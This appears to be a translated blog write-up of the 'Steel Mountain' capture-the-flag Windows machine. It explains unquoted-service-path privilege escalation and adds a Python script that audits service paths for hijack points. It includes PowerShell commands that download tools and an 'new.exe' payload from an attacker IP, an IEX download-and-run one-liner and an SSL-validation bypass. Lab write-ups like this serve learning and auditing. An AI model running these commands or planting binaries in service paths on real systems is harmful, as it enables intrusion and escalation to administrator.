
[Windows] Steel Mountain

우와해커 2020. 4. 14. 17:47

Steel Mountain

Hack into a Mr. Robot themed Windows machine. Use metasploit for initial access, utilise powershell for Windows privilege escalation enumeration and learn a new technique to get Administrator access


Unquoted Service Path (explained in detail below)

[C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe]

Why the file Advanced.exe is uploaded into the IObit folder:
- In the service's binary path the string "Advanced" is cut off at the space, the extension .exe is appended to it, and that file is what gets executed.

 

Windows commands
Service commands
sc stop <service name>
sc start <service name>

 


PowerShell file download commands (two methods)

c:\tmp>powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://10.11.3.30/winPEASx86.exe','winPEAS.exe') 
c:\tmp>powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://10.11.3.30/new.exe','new.exe') 

 

powershell.exe "IEX(New-Object Net.WebClient).downloadString('http:///<script>')"

 

To ignore SSL certificate validation, run the following first and then download:

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};

 

Reference: PowerShell full paths

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  
C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe 


Reference: 15 Ways to Download a File
https://blog.netspi.com/15-ways-to-download-a-file

 

PowerShell PowerUp script usage guides

https://recipeforroot.com/advanced-powerup-ps1-usage/
https://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/

 

PowerUp script (privilege escalation, enumeration)
https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1

 

winPEAS (privilege escalation; enumerates system information, password files and services)
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

PowerShell exploitation cheat sheet (PowerSploit)
https://powersploit.readthedocs.io/en/latest/

Windows local privilege escalation guide (PowerShell section on services)
book.hacktricks.xyz/windows/windows-local-privilege-escalation#servicesAdvancedSystemCareSystem9

 


What in the world is an Unquoted Service Path?

In Windows, if a service's binary path is not enclosed in quotes and contains spaces, the system treats each space as a possible end of the executable name and passes the rest of the path as arguments. Take the following path:

C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe

In order to run SomeExecutable.exe, the system interprets this path in the following order, from 1 to 5:
1. C:\Program.exe
2. C:\Program Files\A.exe
3. C:\Program Files\A Subfolder\B.exe
4. C:\Program Files\A Subfolder\B Subfolder\C.exe
5. C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe

If C:\Program.exe is not found, then C:\Program Files\A.exe is tried.
If C:\Program Files\A.exe is not found, then C:\Program Files\A Subfolder\B.exe is tried, and so on. The first candidate that exists is the one that runs, so a writable directory anywhere along the path is the risk to audit for.
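As an added example (not part of the original post), the path-splitting rule above implemented in Python, generalized to any service ImagePath, and used to audit a list of service entries for candidates whose parent directory is writable. Only the Advanced SystemCare path comes from the post; the other service names, ImagePath values and the set of writable directories are constructed sample input, and `is_writable` is a hypothetical callback that a real audit would replace with an ACL check on the host.

```python
import ntpath
from typing import Callable

# Constructed sample of service ImagePath values (as `sc qc <name>` or the
# registry would show them). Only the Advanced SystemCare entry is from the post.
SAMPLE_SERVICES = {
    "AdvancedSystemCareService9":
        r"C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe",
    "Spooler": r'"C:\Windows\System32\spoolsv.exe"',
    "ConstructedSvc": r"C:\Program Files\Example Vendor\svc.exe -k netsvcs",
    "QuotedVendor": r'"C:\Program Files\Example Vendor\svc.exe" -k netsvcs',
}

# Constructed: directories assumed writable by an unprivileged user on the sample host.
SAMPLE_WRITABLE_DIRS = {r"C:\Program Files (x86)\IObit"}


def candidate_paths(image_path: str) -> list[str]:
    """Return, in order, the executables Windows would try for an ImagePath.

    A quoted path yields exactly one candidate. For an unquoted path the string
    is split at every space; each prefix without an extension gets ".exe"
    appended, exactly as the 1..5 list in the post shows. Enumeration stops at
    the first prefix that already names an executable, since the remaining
    tokens are arguments to it.
    """
    path = image_path.strip()
    if path.startswith('"'):
        end = path.find('"', 1)
        return [path[1:end] if end != -1 else path[1:]]
    tokens = path.split(" ")
    candidates = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if ntpath.splitext(prefix)[1]:      # already has an extension: the real binary
            candidates.append(prefix)
            break
        candidates.append(prefix + ".exe")  # no extension: Windows appends .exe
    return candidates


def hijack_points(image_path: str) -> list[str]:
    """Every candidate tried before the intended binary: if a file existed at
    any of these paths, the service would start it instead."""
    return candidate_paths(image_path)[:-1]


def unquoted_services(services: dict[str, str]) -> list[str]:
    """Names of services whose ImagePath resolves to more than one candidate."""
    return [name for name, path in services.items() if len(candidate_paths(path)) > 1]


def audit_services(services: dict[str, str],
                   is_writable: Callable[[str], bool]) -> dict[str, list[str]]:
    """Map each service to the hijack candidates whose parent directory is
    writable according to is_writable (a hypothetical callback; on a real host
    this would check the directory ACL for the current user)."""
    findings = {}
    for name, image_path in services.items():
        risky = [p for p in hijack_points(image_path) if is_writable(ntpath.dirname(p))]
        if risky:
            findings[name] = risky
    return findings


def sample_is_writable(directory: str) -> bool:
    """Constructed stand-in for an ACL check, backed by SAMPLE_WRITABLE_DIRS."""
    return directory in SAMPLE_WRITABLE_DIRS


if __name__ == "__main__":
    for name, path in SAMPLE_SERVICES.items():
        print(name, "->", candidate_paths(path))
    print("unquoted:", unquoted_services(SAMPLE_SERVICES))
    print("writable hijack points:", audit_services(SAMPLE_SERVICES, sample_is_writable))
```

Note that the IObit path produces four candidates rather than three, because `C:\Program Files` itself is a prefix and `C:\Program Files.exe` is tried before `C:\Program Files (x86)\IObit\Advanced.exe`; the example in the post has no space between "Files" and the next separator, which is why it shows only one candidate per directory level. The fix for any service this flags is to quote the ImagePath (and to keep the intermediate directories writable only by administrators).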


Reference
https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae
